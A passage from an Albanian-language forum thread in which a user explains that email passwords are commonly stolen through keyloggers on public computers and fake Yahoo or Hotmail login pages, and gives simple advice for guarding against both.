  Ndryshuar pėr herė tė fundit nga edspace : 24-05-2007 mė 22:18

 20. #60
  Programues Softueresh Maska e edspace
  Anėtarėsuar
  04-04-2002
  Vendndodhja
  Filadelfia, SHBA
  Mosha
  35
  Postime
  2,573
  Faleminderit
  0
  Falenderuar 2 herė nė 1 postim
  Lexo temat Sigurimi i Kompjuterit dhe Dyshoj se me lexojnė emailet. Aty do gjesh kėshilla se si tė parandalosh vjedhjen e fjalėkalimit. Gjithashtu lexo temėn Si tė hackojme emailet pėr tė mėsuar mėnyrat e ndryshme qė pėrdorin hackerat pėr tė tė vjedhur fjalėkalimin.

  Njė nga mėnyrat mė tė pėrdorura ėshtė instalimi i programeve pėrgjues qė regjistrojnė ato qė shkruan nė tastierė. Kjo metodė pėrdoret shpesh nė kompjuta publikė si ato tė kafeneve, shkollave, librarive, etj. Pėr t'u mbrojtur nga kjo mėnyrė duhet tė tregosh kujdes kur instalon programe qė tė japin tė tjerėt dhe tė instalosh njė program antivirus.

  Mėnyra tjetėr prej nga ėshtė mė e vėshtirė pėr t'u mbrojtur ėshtė falsifikimi i faqes sė identifikimit. Dikush mund tė krijojė njė faqe qė duket njėsoj si faqja e Yahoo-sė ose Hotmail, por kur ti shkruan emrin dhe fjalėkalimin, ky informacion dėrgohet tek hackeri, jo tek Yahoo, apo Hotmail. Pėr t'u mbrojtur nga ky sulm, mos e hap asnjėherė faqen e emailit nga lidhjet e faqeve tė tjera, por shkruaje vetė adresėn e faqes si psh: http://www.yahoo.com ose http://www.hotmail.com. Gjithashtu, para se tė shkruash emrin dhe fjalėkalimin, sigurohu qė adresa nė krye tė shfletuesit (Internet Explorer, Firefox) tregon adresėn e shėrbimit tė email-it. Nėse faqja duket si Yahoo por adresa ėshtė http://www.yahoo-email.com, ka shumė mundėsi qė tė jetė e falsifikuar.
  Edi

Faqja 3 prej 7 FillimFillim 12345 ... FunditFundit

Ruaj Lidhjet

Regullat e Postimit

 • Ju nuk mund tė hapni tema tė reja.
 • Ju nuk mund tė postoni nė tema.
 • Ju nuk mund tė bashkėngjitni skedarė.
 • Ju nuk mund tė ndryshoni postimet tuaja.
 •